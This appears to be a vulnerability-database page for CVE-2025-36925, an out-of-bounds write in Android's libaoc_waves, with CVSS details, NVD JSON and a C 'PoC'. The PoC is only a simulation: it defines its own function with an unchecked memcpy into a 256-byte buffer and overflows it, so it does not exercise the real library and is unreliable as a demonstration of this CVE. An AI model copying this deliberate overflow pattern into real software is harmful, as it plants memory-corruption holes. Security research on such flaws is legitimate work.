Security Vulnerability Report
CVE-2025-36925 CVSS 7.8 HIGH

CVE-2025-36925

Published: 2025-12-11 20:15:57
Last Modified: 2025-12-12 17:36:31

Description

In WAVES_send_data_to_dsp of libaoc_waves.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android Open Source Project (libaoc_waves) < 2025-12-01 security patch level
Google Pixel devices running affected Android versions
Third-party Android devices using the libaoc_waves library

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2025-36925 PoC - libaoc_waves out of bounds write
// This PoC demonstrates triggering the vulnerability in WAVES_send_data_to_dsp
// Compile: gcc -o poc poc.c -ldl
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simulated vulnerable function signature
// Original: void WAVES_send_data_to_dsp(void* data, size_t size)
void WAVES_send_data_to_dsp(void* data, size_t size) {
    // Vulnerable: No bounds checking on size parameter
    unsigned char buffer[256];

    // VULNERABLE CODE: Direct copy without size validation
    memcpy(buffer, data, size);  // size can exceed 256 bytes

    // Process buffer data...
}

int main(int argc, char* argv[]) {
    printf("[*] CVE-2025-36925 PoC - libaoc_waves OOB Write\n");
    printf("[*] Target: WAVES_send_data_to_dsp\n\n");

    // Create malicious input exceeding buffer size
    size_t malicious_size = 512;  // Exceeds 256 byte buffer
    void* malicious_data = malloc(malicious_size);
    if (!malicious_data) {
        printf("[-] Memory allocation failed\n");
        return 1;
    }
    memset(malicious_data, 0x41, malicious_size);  // Fill with 'A'

    printf("[*] Triggering vulnerable function with size: %zu\n", malicious_size);
    printf("[*] Buffer size: 256 bytes\n");
    printf("[*] Input size: %zu bytes (overflow condition)\n\n", malicious_size);

    // Trigger the vulnerability
    WAVES_send_data_to_dsp(malicious_data, malicious_size);

    printf("[+] Function executed - check for memory corruption\n");
    free(malicious_data);
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36925", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:57.110", "lastModified": "2025-12-12T17:36:31.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In WAVES_send_data_to_dsp of libaoc_waves.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}